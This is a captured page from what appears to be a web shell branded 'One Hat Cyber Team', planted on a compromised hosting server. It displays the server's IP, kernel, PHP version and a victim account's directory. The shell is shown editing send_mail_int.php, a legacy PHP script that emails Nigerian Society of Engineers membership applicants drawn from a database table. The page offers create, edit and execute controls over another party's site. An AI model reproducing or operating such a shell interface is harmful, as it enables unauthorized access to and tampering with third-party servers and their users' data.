One Hat Cyber Team
Your IP :
216.73.216.84
Server IP :
50.6.229.107
Server :
Linux server.hostburly.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.2.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
andjemzt
/
nportal.andjemztech.com
/
examAdmin
/
Edit File:
send_mail_int.php
<? include("inc/header.php"); ?> <!--<form id="form1" name="form1" method="post" action=""> <table width="200" border="0" cellspacing="0" cellpadding="5"> <tr> <td valign="top">Message</td> <td><label for="message"></label> <textarea name="message" id="message" cols="45" rows="5"></textarea></td> </tr> <tr> <td colspan="2"><input type="submit" name="submit" id="submit" value="Submit" /></td> </tr> </table> </form>--> <? $msg=$_POST['message']; include("mimemail/MIME.class"); $result=mysql_query("SELECT * FROM stud_mem_reg WHERE reg_type='3' AND processing='0' LIMIT 41,50"); if(!$result){ echo mysql_error(); } $count=mysql_num_rows($result); echo $count."<br>"; while ($row=mysql_fetch_array($result)){ $email=$row['email']; $name=$row['surname']." ".$row['othernames']; $str = "Nigerian Society of Engineers: 2012 Graduate Membership Application"; $html_data = '<html><head><title>'.$str.'</title></head><body bgcolor="#fff0ff" text="#990000"><table width="100%" align="center" border="0" cellspacing="0" cellpadding="0" bgcolor="#A2A1A6"> <tr> <td width="47%" bgcolor="#944B2A"><H1><span style="color:#ffffff">NSE GRADUATE MEMBERSHIP APPLICATION</span></H1></td> </tr> </table></td></tr></table><h4>Dear '.$name.' </h4><br><h3>NSE GRADUATE MEMBERSHIP APPLICATION </h3><br><br><h5><p>Your Application has been received.</p> <p>Please login with your surname and Reference No to continue your registration.</p> <p>Please Visit www.nse.org.ng/apply_online/graduate to continue your registration.</p> <p>Regards</p></h5><br><br><br><h6>Obene Glassber<br>Graduate Membership Coordinator<br>Nigerian Society Enginner<br>National Engineering Center,<br>Off National Mosque - Labour House Road,<br>Central Business District, Abuja.</h6>'; $mime = new MIME_mail("info@nse.org.ng", $email, $str); $mime->attach($html_data, "", HTML, BASE64); $mime->send_mail(); //} if($mime){ echo "Message Sent"; } else{ echo "Message cannot be sent";} } include("inc/footer.php"); ?>
Simpan